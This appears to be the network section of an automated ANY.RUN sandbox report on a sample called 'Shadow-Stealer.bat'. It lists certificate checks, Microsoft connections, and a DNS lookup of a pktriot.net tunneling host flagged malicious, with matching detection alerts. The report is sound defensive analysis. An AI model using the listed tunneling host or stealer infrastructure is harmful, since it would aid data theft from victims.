DNS requests
15
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1980
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
binary
471 b
unknown
4632
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D
unknown
binary
471 b
unknown
6796
SIHClient.exe
GET
200
23.218.209.163:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
binary
418 b
unknown
6796
SIHClient.exe
GET
200
23.218.209.163:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
binary
409 b
unknown
2344
svchost.exe
GET
200
2.21.20.137:80
http://crl.microsoft.com/pki/crl/products/MicWinPCA_2010-07-06.crl
unknown
binary
552 b
unknown
2152
OfficeClickToRun.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
binary
471 b
unknown
2344
svchost.exe
GET
200
23.218.209.163:80
http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
unknown
binary
1.05 Kb
unknown
2344
svchost.exe
GET
200
23.218.209.163:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl
unknown
binary
814 b
unknown
2344
svchost.exe
GET
200
2.21.20.137:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
binary
1.11 Kb
unknown
2344
svchost.exe
GET
200
2.21.20.137:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
binary
824 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
3764
svchost.exe
239.255.255.250:1900
whitelisted
1156
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1980
svchost.exe
40.126.32.68:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
1980
svchost.exe
192.229.221.95:80
EDGECAST
US
whitelisted
4632
backgroundTaskHost.exe
20.223.35.26:443
arc.msn.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4632
backgroundTaskHost.exe
192.229.221.95:80
EDGECAST
US
whitelisted
3892
backgroundTaskHost.exe
104.126.37.137:443
Akamai International B.V.
DE
unknown
4
System
192.168.100.255:137
whitelisted
6796
SIHClient.exe
20.114.59.183:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown

DNS requests

Domain
IP
Reputation
login.live.com
  • 40.126.32.68
  • 20.190.160.20
  • 40.126.32.136
  • 40.126.32.140
  • 20.190.160.22
  • 40.126.32.76
  • 40.126.32.72
  • 40.126.32.74
  • 20.190.159.4
  • 40.126.31.73
  • 40.126.31.67
  • 20.190.159.71
  • 20.190.159.73
  • 20.190.159.0
  • 20.190.159.64
  • 20.190.159.2
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
slscr.update.microsoft.com
  • 20.114.59.183
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted
self.events.data.microsoft.com
  • 20.42.73.26
whitelisted
throbbing-mountain-09011.pktriot.net
  • 167.71.56.116
malicious
nexusrules.officeapps.live.com
  • 52.111.243.29
whitelisted
crl.microsoft.com
  • 2.21.20.137
  • 2.21.20.133
whitelisted
www.microsoft.com
  • 23.218.209.163
whitelisted
umwatson.events.data.microsoft.com
  • 52.182.143.212
whitelisted

Threats

PID
Process
Class
Message
2092
svchost.exe
Misc activity
ET INFO Packetriot Tunneling Domain in DNS Lookup (pktriot .net)
2092
svchost.exe
Misc activity
ET INFO Packetriot Tunneling Domain in DNS Lookup (pktriot .net)
2092
svchost.exe
Misc activity
ET INFO Packetriot Tunneling Domain in DNS Lookup (pktriot .net)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Shadow-Stealer.bat